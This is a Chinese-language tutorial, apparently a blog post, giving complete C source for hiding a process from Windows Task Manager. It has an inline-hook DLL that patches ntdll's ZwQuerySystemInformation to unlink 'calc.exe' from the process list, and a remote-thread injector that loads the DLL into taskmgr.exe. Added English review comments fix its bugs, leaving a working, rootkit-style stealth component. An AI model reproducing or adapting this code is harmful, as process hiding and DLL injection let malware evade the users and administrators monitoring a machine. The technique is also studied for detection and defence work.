InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程


hook步骤:

  • 查找目标函数地址

  • 修改目标函数第一条指令跳转到我们构造的函数

  • 卸载掉钩子,执行正常的目标函数(注意:"摘钩→调用原函数→重新挂钩"的窗口期内,进程中其他线程若调用同一函数,会直接绕过过滤,甚至执行到写了一半的指令;更稳妥的做法是用跳板(trampoline)保存被覆盖的指令,而不是反复摘挂钩子)

  • 原函数返回成功后,再遍历 SystemInformation 缓冲区,把要隐藏的进程节点从链表中摘掉,然后返回(返回状态不成功时——例如任务管理器常先用过小的缓冲区探测长度——缓冲区内容无效,不能遍历)

hook代码如下

#include<windows.h>
#include<Winternl.h>
#include<string.h>
#include<wchar.h>

BOOL hook_code();
BOOL unHook_code();
//Replacement for ntdll!ZwQuerySystemInformation: calls the original, then drops
//the "calc.exe" entry from SystemProcessInformation results.
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
char StroneDate[5]={0x00,0x00,0x00,0x00,0x00,};//backup of the original 5 entry bytes, written back by unHook_code
DWORD OldProtect;//page protection saved by VirtualProtect before patching
DWORD dwAddress;//rel32 displacement of the JMP; computed with DWORD arithmetic, so this is a 32-bit-only design
FARPROC procaddr;//address of ntdll!ZwQuerySystemInformation (also used to call the original while unhooked)
DWORD num;//not referenced anywhere in this listing
byte pBuf[5]={0xE9,0xFF,0xFF,0xFF,0xFF};//E9 rel32 = near JMP; bytes 1..4 are overwritten with dwAddress by hook_code
//Signature of the original function, used to call it through procaddr.
typedef NTSTATUS (WINAPI * ZwQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);

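// DLL entry point.
// The original called hook_code() on every notification (thread attach/detach
// included) and never removed the patch, so after FreeLibrary the JMP at
// ZwQuerySystemInformation pointed into unmapped memory. Install on process
// attach only and restore the original bytes on a dynamic unload.
// Returns FALSE (failing the load) when the hook could not be installed.
BOOL WINAPI DllMain(HMODULE hModule,DWORD call,LPVOID lpreserved)
{
    switch (call)
    {
    case DLL_PROCESS_ATTACH:
        // No per-thread work is done here, so skip thread notifications.
        DisableThreadLibraryCalls(hModule);
        // Runs under the loader lock; hook_code only touches ntdll/kernel32 exports.
        return hook_code();
    case DLL_PROCESS_DETACH:
        // lpreserved is NULL for FreeLibrary (per the DllMain contract); on
        // process termination there is nothing left to protect.
        if (lpreserved == NULL)
        {
            unHook_code();
        }
        break;
    default:
        break;
    }
    return TRUE;
}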
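// Patch the first 5 bytes of ntdll!ZwQuerySystemInformation with a near JMP
// (E9 rel32) to NewZwQuerySystemInformation.
// The original bytes are saved into StroneDate exactly once (first call), so
// the re-hook performed after every filtered call does not overwrite the
// backup with our own JMP.
// Returns TRUE on success, FALSE if the export cannot be resolved or the page
// cannot be made writable (the original silently returned TRUE in both cases).
// 32-bit only: the rel32 displacement is computed with DWORD arithmetic and is
// only guaranteed to reach the target inside a 32-bit address space.
BOOL hook_code()
{
    static BOOL backed_up = FALSE;   // replaces the StroneDate[0] != 0 sentinel
    DWORD scratch = 0;

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == NULL)
    {
        return FALSE;
    }
    FARPROC target = (FARPROC)GetProcAddress(ntdll, "ZwQuerySystemInformation");
    if (target == NULL)
    {
        return FALSE;
    }
    if (!VirtualProtect(target, 5, PAGE_EXECUTE_READWRITE, &OldProtect))
    {
        return FALSE;
    }
    if (!backed_up)
    {
        memcpy(StroneDate, target, 5);
        backed_up = TRUE;
    }
    // Publish procaddr only once a backup exists, so unHook_code never writes
    // an all-zero StroneDate over the function entry.
    procaddr = target;

    // rel32 is relative to the end of the 5-byte JMP instruction.
    dwAddress = (DWORD)(ULONG_PTR)NewZwQuerySystemInformation - (DWORD)(ULONG_PTR)procaddr - 5;
    memcpy(&pBuf[1], &dwAddress, 4);
    memcpy(procaddr, pBuf, 5);

    // Restore the saved protection into a scratch variable so OldProtect keeps
    // the page's original value for unHook_code.
    VirtualProtect(procaddr, 5, OldProtect, &scratch);
    FlushInstructionCache(GetCurrentProcess(), procaddr, 5);
    return TRUE;
}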

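// Write the 5 saved bytes back over ntdll!ZwQuerySystemInformation so the
// original function can be called (and so the DLL can be unloaded safely).
// Returns FALSE if the hook was never installed (procaddr still NULL) or the
// page cannot be made writable; the original always returned TRUE.
BOOL unHook_code()
{
    DWORD scratch = 0;

    if (procaddr == NULL)
    {
        return FALSE;
    }
    if (!VirtualProtect(procaddr, 5, PAGE_EXECUTE_READWRITE, &OldProtect))
    {
        return FALSE;
    }
    memcpy(procaddr, StroneDate, 5);
    VirtualProtect(procaddr, 5, OldProtect, &scratch);
    FlushInstructionCache(GetCurrentProcess(), procaddr, 5);
    return TRUE;
}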
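// Hook body: temporarily remove the patch, call the real
// ZwQuerySystemInformation, and, for SystemProcessInformation, unlink every
// entry whose image name is "calc.exe" from the singly linked list that the
// caller (Task Manager) walks via NextEntryOffset.
//
// Fixes relative to the original:
//  - The buffer is only walked when the call succeeded. Task Manager first
//    probes with a too-small buffer (STATUS_INFO_LENGTH_MISMATCH); the original
//    walked uninitialized memory in that case.
//  - The name compare covered only 4 bytes (two WCHARs, "ca"), so any process
//    starting with "ca" was hidden. The full name is compared now.
//  - Every visible entry becomes the "previous" node, including entries with a
//    NULL image name (e.g. the idle process). The original skipped those, so
//    unlinking an entry that followed one produced a wrong NextEntryOffset.
//  - NULL previous node is tolerated instead of dereferenced.
//  - Pointer arithmetic uses PUCHAR instead of a ULONG cast.
//
// NOTE(review): the unhook -> call -> rehook sequence is not thread-safe.
// Another thread calling ZwQuerySystemInformation in that window sees the
// unfiltered list, or may execute a half-written patch. A trampoline would
// avoid this; kept as-is to preserve the article's design.
// NOTE(review): Reserved2[1] lines up with ImageName.Buffer in the winternl.h
// this article was built against; newer SDKs declare ImageName as a
// UNICODE_STRING directly -- verify against the header in use. wcscmp also
// relies on the buffer being NUL-terminated, which UNICODE_STRING does not
// formally guarantee; a Length-bounded compare would be more robust.
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength)
{
    unHook_code();
    NTSTATUS status = ((ZwQuerySystemInformation)procaddr)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

    if (NT_SUCCESS(status) && SystemInformationClass == SystemProcessInformation && SystemInformation != NULL)
    {
        PSYSTEM_PROCESS_INFORMATION pcurr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
        PSYSTEM_PROCESS_INFORMATION plast = NULL;   // last entry left visible

        for (;;)
        {
            PCWSTR name = (PCWSTR)pcurr->Reserved2[1];   // ImageName.Buffer
            BOOL hide = (name != NULL) && (wcscmp(name, L"calc.exe") == 0);   // case-sensitive, as in the original

            if (hide)
            {
                // Splice pcurr out: the previous visible node now points past it.
                // Consecutive hidden entries accumulate because plast is not advanced.
                if (plast != NULL)
                {
                    if (pcurr->NextEntryOffset == 0)
                    {
                        plast->NextEntryOffset = 0;
                    }
                    else
                    {
                        plast->NextEntryOffset += pcurr->NextEntryOffset;
                    }
                }
                // plast == NULL: the very first entry is the one to hide; there is
                // no predecessor to rewrite, so it stays visible rather than crashing.
            }
            else
            {
                plast = pcurr;
            }

            if (pcurr->NextEntryOffset == 0)
            {
                break;
            }
            pcurr = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pcurr + pcurr->NextEntryOffset);
        }
    }

    hook_code();
    return status;
}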

使用远线程注入,将hookdll注入到任务管理器(注入器、hookdll 与 taskmgr.exe 三者的位数必须一致;本文代码用 32 位指针运算计算跳转偏移,只适用于 32 位的任务管理器进程)

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<Tlhelp32.h>
#define PATH "C:\\Users\\john\\Desktop\\hookdll.dll"//absolute path of the DLL to inject; it is resolved by LoadLibrary inside the target process, so it must exist on that machine
BOOL EnumProcess();//finds taskmgr.exe and stores its PID in dwPID
BOOL Inject(DWORD);//writes PATH into the target and runs LoadLibrary on it via a remote thread
DWORD dwPID;//PID of taskmgr.exe, filled in by EnumProcess
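// Entry point: locate taskmgr.exe and inject the hook DLL into it.
// Declared int main(void) (the standard form; the original used void main()).
// Returns 0 on success, 1 when Task Manager is not running or injection fails.
int main(void)
{
    if (!EnumProcess())
    {
        printf("taskmgr.exe not found\n");
        return 1;
    }
    if (!Inject(dwPID))
    {
        printf("Inject failed: %lu\n", GetLastError());
        return 1;
    }
    return 0;
}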

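// Walk a Toolhelp process snapshot looking for taskmgr.exe; on a match store
// its PID in the global dwPID and return TRUE, otherwise FALSE.
// Fixes relative to the original: the snapshot handle is closed on every path
// (it leaked before), an INVALID_HANDLE_VALUE snapshot is no longer passed on
// to Process32First, and the name compare is case-insensitive, since Windows
// file names are (the snapshot may report "Taskmgr.exe").
// Assumes a non-UNICODE build: szExeFile is compared as a char string, as in
// the original.
BOOL EnumProcess()
{
    PROCESSENTRY32 pe32 = {0};
    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot Error :%lu", GetLastError());
        return FALSE;
    }

    BOOL found = FALSE;
    for (BOOL more = Process32First(hProcessSnap, &pe32); more; more = Process32Next(hProcessSnap, &pe32))
    {
        if (_stricmp("taskmgr.exe", pe32.szExeFile) == 0)
        {
            dwPID = pe32.th32ProcessID;
            found = TRUE;
            break;
        }
    }

    CloseHandle(hProcessSnap);
    return found;
}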
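// Inject the DLL at PATH into process dwPID: write the path string into the
// target, then start a remote thread at LoadLibraryA with that string as its
// argument.
// Fixes relative to the original:
//  - WriteProcessMemory copied 0x1000 bytes out of a ~40-byte string literal,
//    reading far past it; only strlen(PATH)+1 bytes are written now.
//  - LoadLibraryA is named explicitly. The bare LoadLibrary macro becomes
//    LoadLibraryW in a UNICODE build and would read the ANSI path as UTF-16.
//  - Every API result is checked and the thread/process handles and the remote
//    allocation are released; the original leaked all three and always
//    returned TRUE.
//  - The remote page holds only a string, so it is PAGE_READWRITE rather than
//    PAGE_EXECUTE_READWRITE, and OpenProcess asks for just the rights needed
//    instead of PROCESS_ALL_ACCESS.
// Returns TRUE only when the remote LoadLibraryA returned a non-NULL module.
// NOTE(review): passing this process's LoadLibraryA address to the target
// assumes kernel32 is mapped at the same base in both processes, which holds
// for same-bitness processes in a single boot session -- confirm for the target.
BOOL Inject(DWORD dwPID)
{
    BOOL ok = FALSE;
    HANDLE hand = NULL;
    HANDLE hThread = NULL;
    LPVOID lpaddress = NULL;
    DWORD exitCode = 0;
    const SIZE_T pathLen = strlen(PATH) + 1;   // include the terminating NUL

    hand = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                       FALSE, dwPID);
    if (hand == NULL)
    {
        return FALSE;
    }

    lpaddress = VirtualAllocEx(hand, NULL, pathLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (lpaddress == NULL)
    {
        goto cleanup;
    }
    if (!WriteProcessMemory(hand, lpaddress, PATH, pathLen, NULL))
    {
        goto cleanup;
    }

    hThread = CreateRemoteThread(hand, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, lpaddress, 0, NULL);
    if (hThread == NULL)
    {
        goto cleanup;
    }

    // Wait for LoadLibraryA to finish before releasing the path buffer it reads.
    WaitForSingleObject(hThread, INFINITE);
    // The thread's exit code is LoadLibraryA's HMODULE (fits in 32 bits on x86).
    if (GetExitCodeThread(hThread, &exitCode))
    {
        ok = (exitCode != 0);
    }

cleanup:
    if (hThread != NULL)
    {
        CloseHandle(hThread);
    }
    if (lpaddress != NULL)
    {
        VirtualFreeEx(hand, lpaddress, 0, MEM_RELEASE);
    }
    CloseHandle(hand);
    return ok;
}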

效果图如下: